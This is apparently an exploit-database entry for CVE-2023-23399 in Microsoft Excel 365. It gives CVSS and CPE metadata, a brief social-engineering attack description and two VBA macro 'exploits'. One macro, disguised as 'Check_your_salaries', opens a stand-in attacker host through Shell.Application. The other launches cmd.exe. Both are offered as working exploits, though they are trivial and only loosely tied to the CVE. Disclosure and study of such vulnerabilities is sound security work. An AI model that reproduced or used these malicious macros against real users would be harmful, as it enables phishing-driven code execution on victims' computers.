Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)

vendor:

Microsoft Excel 365 MSO

by:

nu11secur1ty

7.5

CVSS

HIGH

Remote Code Execution (RCE)

CWE

Product Name: Microsoft Excel 365 MSO

Affected Version From: Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit

Affected Version To: Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit

Patch Exists: NO

Related CWE: CVE-2023-23399

CPE: a:microsoft:excel:365_mso:2302_build_16.0.16130.20186

Metasploit: https://www.rapid7.com/db/vulnerabilities/office-for-mac-cve-2023-23399/, https://www.rapid7.com/db/vulnerabilities/msft-cve-2023-23399/, https://www.rapid7.com/db/vulnerabilities/microsoft-office-cve-2023-23399/

Other Scripts:

Platforms Tested: Windows

2023

Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit – Remote Code Execution (RCE)

The malicious user can exploit the victim's PC remotely. For example, when the score indicates that the Attack Vector is Local and User Interaction is Required, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer.

Mitigation:

The user should be aware of the malicious files and should not open them.

Source

Exploit-DB raw data:

## Exploit Title: Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)
## Exploit Author: nu11secur1ty
## Date: 03.16.2023
## Vendor: https://www.microsoft.com/en-us/microsoft-365/excel
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://www.invicti.com/learn/remote-code-execution-rce/
## CVE ID: CVE-2023-23399

## Description:
The malicious user can exploit the victim's PC remotely.
For example, when the score indicates that the Attack Vector is Local
and User Interaction is Required, this could describe an exploit in
which an attacker, through social engineering, convinces a victim to
download and open a specially crafted file from a website which leads
to a local attack on their computer.

STATUS: HIGH Vulnerability

[+]Exploit0:
```
Sub Check_your_salaries()
CreateObject("Shell.Application").ShellExecute
"microsoft-edge:https://attacker.com"
End Sub
```
[+]Exploit1:
```
Sub cmd()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "cmd.exe"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399)

## Proof and Exploit:
[href](https://streamable.com/dnyfx0)

## Time spend:
03:00:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>